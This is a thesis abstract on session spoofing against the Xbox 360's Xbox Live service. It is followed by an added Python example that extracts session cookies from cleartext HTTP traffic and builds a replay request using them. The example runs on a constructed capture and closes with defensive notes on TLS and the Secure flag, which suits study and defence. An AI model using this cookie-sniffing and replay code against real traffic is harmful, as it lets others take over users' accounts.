Investigating evidence produced by online session spoofing: the Xbox 360
Video games and the consoles on which they are played have become progressively more popular in recent years; the body of work on how they should be handled forensically, however, remains surprisingly thin. These consoles also rely at least in part on digital distribution, offering digital goods and services to the consumer through various forms of digital storefront, much as is now common among PC gamers. The protections around these storefronts, beyond the encryption used for communications and transactions, are typically account-based. This leaves both the user and the operator of the distribution service open to session spoofing, an attack in which the attacker masks their identity by reusing a pre-existing, still-active communication ‘session’ between a service and a victim user.
The aims of this thesis are therefore twofold: first, to explore the vulnerabilities of such a service in the domain of video game consoles, and second, to add to the existing body of knowledge on video game consoles, session spoofing attacks, and the forensic techniques that can be applied to both. Towards these goals, the thesis begins with a literature review of current publications on video game forensics, session spoofing and online marketplaces, and ultimately focuses on the Xbox 360 because of its design similarities with the modern PC. Of prime concern in this review are the unique challenges of applying forensic methods to video game consoles, which stem mainly from their unusual design and the heavy anti-piracy and encryption measures typically deployed on them. All tests were carried out on an isolated network, in compliance with university policy and the law, so that the only session identifiers collected were those sent to the test computer as a result of the Xbox 360 performing the usual and expected actions of a game player. An initial test attempted to short-circuit the login of an Xbox 360 into the Xbox Live service, so that one user would appear as another while the Xbox 360 handled all other communications once the spoof succeeded. This proved untenable because of the heavy encryption the Xbox 360 applies to its communications with the Xbox Live service.
A revised test was therefore devised, focusing instead on how the Xbox Live service might, in the course of normal use, allow a session spoofing attack to be performed. To this end the traffic from an Xbox 360 was analyzed, with attention paid to the Xbox Live service, the applications it provides, and ultimately the Internet Explorer application supplied through the service. This led to the observation that the Internet Explorer application (app) is a simple, albeit unpatched, version of the Internet Explorer program for PCs, and as such is vulnerable to session spoofing using the session identifiers the app sends in its traffic. Unfortunately, during this adjusted test, the plans for a forensic investigation of the Xbox 360 had to be dropped, and that investigation is not part of this thesis. From these findings, areas of weakness in the Xbox Live service are identified, and the attack is compared with the findings of the papers reviewed in the literature. More work remains to be done in this area, notably in the forensic field, and further exploratory research should be made into the Xbox Live service and its counterparts on other consoles and on the PC itself. Such work would better prepare investigators for console investigations and alert console developers to weaknesses that can be patched.
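The attack the revised test relies on is generic to any browser that sends its session identifier in cleartext HTTP: a passive observer on the same network reads the Cookie or Set-Cookie header and replays it. The following is an added example, not code or data from the thesis, showing that extraction and replay over a constructed capture; the host name, cookie names, values and the name heuristics are invented for illustration.

```python
"""Added example (not from the thesis): pull session-looking cookies out of
cleartext HTTP traffic and build the request that would reuse one of them.
Host, cookie names and values below are invented; the capture is constructed."""
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Constructed sample traffic as a passive sniffer would see it, ordered as on
# the wire: request, response, further requests.  Not real console data.
SAMPLE_CAPTURE: List[Tuple[str, str]] = [
    ("request",
     "GET /login HTTP/1.1\r\nHost: store.example.test\r\n\r\n"),
    ("response",
     "HTTP/1.1 200 OK\r\n"
     "Set-Cookie: SESSIONID=7f3a9c; Path=/; HttpOnly\r\n"
     "Set-Cookie: theme=dark; Path=/\r\n"
     "Content-Length: 0\r\n\r\n"),
    ("request",
     "GET /account HTTP/1.1\r\nHost: store.example.test\r\n"
     "Cookie: SESSIONID=7f3a9c; theme=dark\r\n\r\n"),
    ("request",
     "GET /cart HTTP/1.1\r\nHost: store.example.test\r\n"
     "Cookie: auth_token=ZmFrZQ==; SESSIONID=7f3a9c\r\n\r\n"),
]

# Assumed name fragments that mark a cookie as a session identifier.
SESSION_NAME_HINTS = ("sess", "sid", "token", "auth")


def parse_message(raw: str) -> Tuple[str, List[Tuple[str, str]]]:
    """Split a raw HTTP message into its start line and lower-cased (name, value) headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def parse_cookie_pairs(value: str) -> Dict[str, str]:
    """Parse a Cookie header ('a=1; b=2') into a dict."""
    pairs = {}
    for part in value.split(";"):
        part = part.strip()
        if "=" in part:
            k, v = part.split("=", 1)
            pairs[k.strip()] = v.strip()
    return pairs


def parse_set_cookie(value: str) -> Tuple[str, str, Dict[str, str]]:
    """Parse a Set-Cookie header into (name, value, lower-cased attributes)."""
    parts = [p.strip() for p in value.split(";")]
    name, val = parts[0].split("=", 1)
    attrs: Dict[str, str] = {}
    for p in parts[1:]:
        if "=" in p:
            k, v = p.split("=", 1)
            attrs[k.strip().lower()] = v.strip()
        else:
            attrs[p.lower()] = ""
    return name.strip(), val.strip(), attrs


def looks_like_session_id(name: str) -> bool:
    """Heuristic: the cookie name contains one of the assumed hint fragments."""
    n = name.lower()
    return any(h in n for h in SESSION_NAME_HINTS)


@dataclass
class ExposedSession:
    host: str
    name: str
    value: str
    seen_in: List[str] = field(default_factory=list)
    secure: bool = False    # Secure attribute seen on Set-Cookie
    httponly: bool = False  # HttpOnly only limits script access, not sniffing


def find_exposed_sessions(capture: List[Tuple[str, str]]) -> Dict[str, ExposedSession]:
    """Walk cleartext HTTP messages and collect every session-looking cookie.
    Anything collected here was readable by a passive observer."""
    host = "?"
    found: Dict[str, ExposedSession] = {}
    for _direction, raw in capture:
        _start, headers = parse_message(raw)
        for hname, hval in headers:
            if hname == "host":
                host = hval
        for hname, hval in headers:
            if hname == "set-cookie":
                name, val, attrs = parse_set_cookie(hval)
                if looks_like_session_id(name):
                    e = found.setdefault(name, ExposedSession(host, name, val))
                    e.seen_in.append("set-cookie")
                    e.secure = "secure" in attrs
                    e.httponly = "httponly" in attrs
            elif hname == "cookie":
                for name, val in parse_cookie_pairs(hval).items():
                    if looks_like_session_id(name):
                        e = found.setdefault(name, ExposedSession(host, name, val))
                        e.seen_in.append("cookie")
    return found


def build_replay_request(exposed: ExposedSession, path: str = "/account") -> str:
    """The spoofed request: same host, same cookie, nothing else from the victim."""
    return (f"GET {path} HTTP/1.1\r\nHost: {exposed.host}\r\n"
            f"Cookie: {exposed.name}={exposed.value}\r\n\r\n")


if __name__ == "__main__":
    for sess in find_exposed_sessions(SAMPLE_CAPTURE).values():
        print(sess)
        print(build_replay_request(sess))
```

The HttpOnly flag on the constructed SESSIONID cookie is recorded but deliberately does not exclude it: that flag protects against in-browser script access, not against an observer on the wire, which is the position the thesis's test computer occupies. Only carrying the identifier over TLS (and marking it Secure so the client never sends it in the clear) removes it from this list.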